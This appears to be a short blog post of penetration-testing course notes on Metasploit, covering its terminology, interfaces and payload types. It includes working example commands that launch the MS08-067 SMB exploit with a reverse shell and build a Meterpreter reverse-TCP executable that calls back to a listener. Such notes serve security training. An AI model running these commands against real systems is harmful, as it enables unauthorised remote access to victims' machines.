Source: "Advanced Penetration Testing" Cybrary
*Exploitation Framework *Written in Ruby *Modular Exploits, payloads, auxiliaries, and more Terminology: *Exploit: vector for penetrating the system *Payload: shellcode, what you want the exploit to do after exploitation *Auxiliary: other exploit modules such as scanning, information gathering Session: connection from a successful exploit Interfaces Msfconsole Msfcli Armitage Utilities Msfpayload Msfencode Msfupdate Msfvenom Traditional vs. Metasploit Traditional Exploit Find public exploit Replace offsets, return address, etc. for your target Replace shellcode Metasploit Load Metasploit module Select target Select payload Metasploit Payloads Bind shell – opens a port on the victim machine Reverse shell – pushes a shell back to the attacker Inline – full payload in the exploit Staged – shellcode calls back to attacker to get the rest Msfcli [command line option] O = Show options P = Show payloads E = Run exploit E.g., $: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/ reverse_tcp LHOST=10.0.0.100 E Msfvenom Make shellcode and stand alone payloads -l list modules -f output format -p payload to use E.g., $: msfvenom -p windows/messagebox text="Hello World" -f exe > test.exe Multi/Handler *Generic payload handler *Catch payloads started outside of the framework msf> use multi/handler $: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |